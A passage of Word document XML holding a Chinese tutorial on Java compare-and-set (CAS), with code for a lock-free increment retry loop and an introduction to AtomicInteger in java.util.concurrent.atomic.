        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>(a.compareAndSet(expect,a+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="number"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="C00000"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>)) {  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00261FD1" w:rsidRDefault="00261FD1" w:rsidP="00261FD1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="999999"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5FAE2"/>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doSomeThing1();  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00261FD1" w:rsidRDefault="00261FD1" w:rsidP="00261FD1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="999999"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5FAE2"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="555555"/>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00FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>else</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> {  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00261FD1" w:rsidRDefault="00261FD1" w:rsidP="00261FD1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="999999"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5FAE2"/>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doSomeThing2();  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00261FD1" w:rsidRDefault="00261FD1" w:rsidP="00261FD1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="999999"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5FAE2"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>}  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00261FD1" w:rsidRDefault="00261FD1" w:rsidP="00261FD1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>这样如果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的值被改变了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>a++</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>就不会被执行。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00261FD1" w:rsidRDefault="00261FD1" w:rsidP="00261FD1">
      <w:pPr>
        <w:pStyle w:val="a4"/>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按照上面的写法，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>a!=expect</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>之后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,a++</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>就不会被执行，如果我们还是想执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>a++</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>操作怎么办，没关系，可以采用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>while</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>循环</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00261FD1" w:rsidRDefault="00261FD1" w:rsidP="00261FD1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:rPr>
          <w:rStyle w:val="tracking-ad"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Consolas"/>
          <w:color w:val="C0C0C0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0C0C0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t>[java]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Consolas"/>
          <w:color w:val="C0C0C0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId165" w:tooltip="view plain" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Consolas"/>
            <w:color w:val="A0A0A0"/>
            <w:sz w:val="14"/>
            <w:szCs w:val="14"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>view plain</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Consolas"/>
          <w:color w:val="C0C0C0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId166" w:tgtFrame="_blank" w:tooltip="copy" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Consolas"/>
            <w:color w:val="A0A0A0"/>
            <w:sz w:val="14"/>
            <w:szCs w:val="14"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>copy</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00261FD1" w:rsidRDefault="00261FD1" w:rsidP="00261FD1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Consolas"/>
          <w:color w:val="C0C0C0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId167" w:tgtFrame="_blank" w:tooltip="print" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Consolas"/>
            <w:color w:val="A0A0A0"/>
            <w:sz w:val="14"/>
            <w:szCs w:val="14"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>print</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId168" w:tooltip="?" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Consolas"/>
            <w:color w:val="A0A0A0"/>
            <w:sz w:val="14"/>
            <w:szCs w:val="14"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>?</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00261FD1" w:rsidRDefault="00261FD1" w:rsidP="00261FD1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="999999"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5FAE2"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="5C5C5C"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>while</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>) {  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00261FD1" w:rsidRDefault="00261FD1" w:rsidP="00261FD1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="999999"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5FAE2"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="555555"/>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00FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> expect = a;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00261FD1" w:rsidRDefault="00261FD1" w:rsidP="00261FD1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="999999"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5FAE2"/>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00FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> (a.compareAndSet(expect, a + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="number"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="C00000"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>)) {  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00261FD1" w:rsidRDefault="00261FD1" w:rsidP="00261FD1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="999999"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5FAE2"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>        doSomeThing1();  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00261FD1" w:rsidRDefault="00261FD1" w:rsidP="00261FD1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="999999"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5FAE2"/>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00FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00261FD1" w:rsidRDefault="00261FD1" w:rsidP="00261FD1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="999999"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5FAE2"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>    } </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>else</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> {  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00261FD1" w:rsidRDefault="00261FD1" w:rsidP="00261FD1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="999999"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5FAE2"/>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doSomeThing2();  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00261FD1" w:rsidRDefault="00261FD1" w:rsidP="00261FD1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="999999"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5FAE2"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>    }  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00261FD1" w:rsidRDefault="00261FD1" w:rsidP="00261FD1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="999999"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5FAE2"/>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261FD1" w:rsidRDefault="00261FD1" w:rsidP="00261FD1">
      <w:pPr>
        <w:pStyle w:val="a4"/>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采用上面的写法，在没有锁的情况下实现了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>a++</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>操作，这实际上是一种非阻塞算法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00261FD1" w:rsidRDefault="00261FD1" w:rsidP="00261FD1">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="390" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00261FD1" w:rsidRDefault="00261FD1" w:rsidP="00261FD1">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="390" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="t1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>java.util.concurrent.atomic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>包中几乎大部分类都采用了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CAS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>操作，以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>AtomicInteger</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>为例，看看它几个主要方法的实现：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00261FD1" w:rsidRDefault="00261FD1" w:rsidP="00261FD1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:rPr>
          <w:rStyle w:val="tracking-ad"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Consolas"/>
          <w:color w:val="C0C0C0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0C0C0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t>[java]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Consolas"/>
          <w:color w:val="C0C0C0"/>
          <w:sz w:val="14"/>
